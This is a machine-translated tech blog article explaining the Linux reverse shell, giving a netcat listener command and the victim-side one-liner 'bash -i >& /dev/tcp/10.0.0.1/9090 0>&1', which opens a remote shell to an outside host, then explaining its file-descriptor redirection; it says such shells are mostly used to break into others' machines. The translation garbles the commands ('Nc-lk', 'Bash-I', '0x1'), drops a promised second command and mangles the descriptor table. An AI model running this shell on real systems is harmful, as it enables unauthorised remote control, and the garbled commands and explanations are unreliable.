Shulou(Shulou.com)06/01 Report--

This article mainly introduces "the parsing of Linux's bounce shell command". In daily operation, I believe many people have doubts about the parsing of Linux's bounce shell command. The editor has consulted all kinds of data and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts of "Linux bounce shell command parsing". Next, please follow the editor to study!

1. What is a rebound shell?

To put it simply, host A can return all the return values to A by executing the command on host B.

two。 The purpose of bouncing shell

Most of the purpose of this rebound shell is to hack into other people's hosts. It was because I felt so strong that I came to study this guy

3. Steps to rebound shell

3.1. Open port 9090 on this machine

Nc-lk 9090

3.2. Execute one of the following two commands on the machine that needs to be controlled

Bash-I > & / dev/tcp/10.0.0.1/9090 0 > & 1

3.3. Just enter the command of the host that needs to be controlled under the nc-lk 9090 command line of the local machine.

4. Principle

Host An opens the tcp service at port 9090

Host B connects to the 9090 tcp service of host A

Host A sends commands to host B through tcp service

Host B reads commands and executes them in bash

Host B sends the execution result to host A.

In this way, you can 'play' with host B in host A

Here's the point.

We think this operation is actually quite simple, but we can't just limit it to the surface. We need to understand how it works.

In fact, there is nothing to say about the nc-lk 9090 command. Baidu google came out as soon as it was searched. What we are going to explain today is bash-I > & / dev/tcp/10.0.0.1/9090 0 > & 1. No results were found on google for this order. So I have to work the night shift on my own.

The commonly used file descriptors under inux shell are:

Standard input (stdin): code is 0, using

>

Standard error output (stderr): code is 2, use 2 > or 2 > >.

First of all, let's disassemble this order.

Bash-I # I don't know what to say > & # this command actually inputs stderr into stdout. It is equivalent to `> xxx 2 > & 1` / dev/tcp/10.0.0.1/9090 # this is port 9090 connected to 10.0.0.1 port 0 > & 1 # this has not been understood on google Baidu for a long time, and can only study the documents.

In fact, it is easy to understand the combination of the first three commands, which is to send all the output under this bash to 10.0.0.1 9090. You can do this yourself and get rid of the latter 0 > & 1.

It is easy to understand that we write 2 > & 1 in the command, which is to redirect error to stdout. But 0 > & 1 seems to be difficult to understand. Let's take a look at the file descriptor.

What we see here is that 2 > & 1 changes the device corresponding to the file descriptor 2 to the device corresponding to the file descriptor 1. In the same way, 0 > & 1 means to change the device corresponding to 0 to the device corresponding to 1, that is, socket. This indicates that stdin reads data from socket, and then executes the command, sending the command line return of bash to socket via stdout.

In fact, all these contents can be found in bash's man pages.

N&word is clearly written in the document, isn't it? copy word to n.

So it is all right to write 0x1 here, just copy the device corresponding to the file descriptor 1 to the file descriptor 0.

At this point, the study of "the parsing of Linux's bounce shell command" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.